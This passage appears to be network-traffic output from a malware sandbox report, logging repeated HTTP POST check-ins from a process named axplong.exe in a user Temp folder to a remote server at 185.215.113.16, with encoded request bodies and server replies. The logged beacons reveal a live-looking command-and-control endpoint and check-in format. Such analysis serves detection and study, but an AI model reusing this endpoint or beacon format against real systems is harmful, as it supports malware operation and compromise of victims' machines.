                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:45 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    38192.168.2.849750185.215.113.16807648C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:43:46.062115908 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:46.741004944 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:46 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:46.815681934 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:47.039669037 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:46 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    39192.168.2.849751185.215.113.16807648C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:43:47.162480116 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:47.881541967 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:47 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:47.883569956 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:48.108424902 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:48 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    40192.168.2.849752185.215.113.16807648C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:43:48.224610090 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:48.936373949 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:48 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:48.937423944 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:49.170749903 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:49 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    41192.168.2.849753185.215.113.16807648C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:43:49.441677094 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:50.147353888 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:50 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:50.148298025 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:50.381314993 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:50 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    42192.168.2.849754185.215.113.16807648C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:43:50.489147902 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:51.199959040 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:51 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:51.200833082 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:51.435882092 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:51 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    43192.168.2.849755185.215.113.16807648C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:43:51.551899910 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:52.249130964 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:52 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:52.254076004 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:52.477385044 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:52 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    44192.168.2.849756185.215.113.16807648C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:43:52.923703909 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:53.636210918 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:53 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:53.637239933 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:53.869591951 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:53 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    45192.168.2.849757185.215.113.16807648C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:43:53.990462065 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:54.714360952 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:54 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:54.715310097 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:54.938955069 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:54 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    46192.168.2.849758185.215.113.16807648C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:43:55.051268101 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:55.742865086 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:55 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:55.783298969 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:56.004493952 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:55 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    47192.168.2.849759185.215.113.16807648C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:43:56.113441944 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:56.828773022 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:56 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:56.829586029 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:57.061820030 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:56 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    48192.168.2.849760185.215.113.16807648C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:43:57.176048040 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:57.868886948 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:57 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:57.869610071 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:58.091711998 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:57 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    49192.168.2.849761185.215.113.16807648C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:43:58.287947893 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:59.003110886 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:58 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:59.004019022 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:59.242244005 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:59 GMT
                    Content-Type: text/html; charset=UTF-8
